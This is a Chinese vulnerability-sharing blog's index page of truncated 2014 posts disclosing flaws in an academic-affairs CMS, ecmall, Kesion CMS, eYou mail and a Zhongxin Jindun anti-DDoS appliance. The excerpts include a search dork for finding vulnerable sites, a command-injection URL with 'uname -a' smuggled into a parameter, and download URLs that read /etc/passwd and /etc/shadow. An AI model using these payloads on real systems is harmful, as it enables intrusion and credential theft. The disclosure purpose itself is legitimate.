漏洞时代

因为改版,丢失了大量的友情..本站的文章都大多源自网络.并不是都是原创。如果没有著名出处。可能是转载文章的时候没有写或者是文章本身就是转载的就没在写出处。本站定位就是分享资源。如果有版权问题,请联系本站删除或者更改!!!需要交换链接的朋友请到关于我们留言~~

某教务系统通用Oracle注入&任意文件上传

#1.该套"JSP+Oracle"的CMS主要用于大学、职业技术学校的教务系统,有不少大学(包括中国药科大学教务处)也在使用该套系统,其系统含有SQL注入漏洞和一个任意文件上传漏洞,导致不仅仅可以注入,也可以上传JSP脚本木马。通过谷歌、百度、搜狗等搜索引擎可以爬行到大量使用该教务系统的网站。 [php] Google or Baiduinurl:ACTIONSHOWNEWSinurl:AC...

没穿底裤 2014 年 05 月 04 日 暂无评论

ecmall2.x修改任意管理员和用户密码

app/find_password.php [php] function set_password() { if (!IS_POST) { ...... } else //POST提交 { if (empty($_POST['new_password']) || empty($_POST['confirm_password'])) { $this->show_warning("unsettl...

没穿底裤 2014 年 05 月 02 日 暂无评论

科讯KESION CMS最新版任意文件上传WEBSHELL

会员上传文件漏洞,可以上传任意后缀user/swfupload.asp文件漏洞[php]If UpFileObj.Form("NoReName")="1" Then '不更名Dim PhysicalPath,FsoObj:Set FsoObj = KS.InitialObject(KS.Setting(99))PhysicalPath = Server.MapPath(replace(Tem...

没穿底裤 2014 年 05 月 02 日 15 条评论

中新金盾抗拒绝服务系统GetShell漏洞2

漏洞作者: Tea漏洞证明: https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo命令:uname -a > /tmp/1写入到/tmp/1文件可以写任意文件到任意目录,还愁啥? 

没穿底裤 2014 年 04 月 27 日 暂无评论

中新金盾抗拒绝服务系统GetShell漏洞

漏洞作者: Tea任意文件下载漏洞:https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwdhttps://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/shadowS...

没穿底裤 2014 年 04 月 27 日 暂无评论

eYou邮件系统远程命令执行

#1 漏洞代码/grad/admin/domain_logo.php [php] [/php] [php] $domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 可远程执行任意命令 [/php] #2 漏洞利用访问htt...

没穿底裤 2014 年 04 月 26 日 7 条评论